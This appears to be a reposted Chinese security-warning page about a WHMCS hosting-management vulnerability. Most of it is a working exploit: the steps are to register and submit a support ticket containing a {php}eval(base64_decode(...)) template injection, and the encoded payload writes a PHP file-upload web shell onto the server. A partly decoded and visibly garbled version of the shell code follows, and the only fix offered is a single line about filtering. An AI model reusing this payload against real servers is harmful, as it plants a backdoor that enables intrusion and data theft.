2024年3月10日发(作者:)
whmcs主机管理系统0day及修复漏洞预警-电脑资料
先注册个id
提交一个ticket如下
{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2R
lKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJqM
GlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJ
wY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVndiRzlo
WkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2
SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBp
Wm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnV
ZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQ
U0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZj
bTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0
FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpK
VEVWVFd5ZG1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmU
mtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJo
dklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WW
o0OFluSStQR0p5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBH
SStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnl
QaWM3SUgwTkNuME5DajgrIik7DQokZm8gPSBmb3Blbigia2lyL
nBocCIsInciKTsNCmZ3cml0ZSgkZm8sJGNvZGUpOw=='));{/php}
base64解密后:
$code =
echo '';
echo '
Upload
';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name']))
{ echo 'Upload SUKSES
'; }
else { echo 'Upload GAGAL
'; }
}
>
$fo = fopen("","w");
fwrite($fo,$code);
则成功创建了一个php小马
修复:
合适过滤
发布评论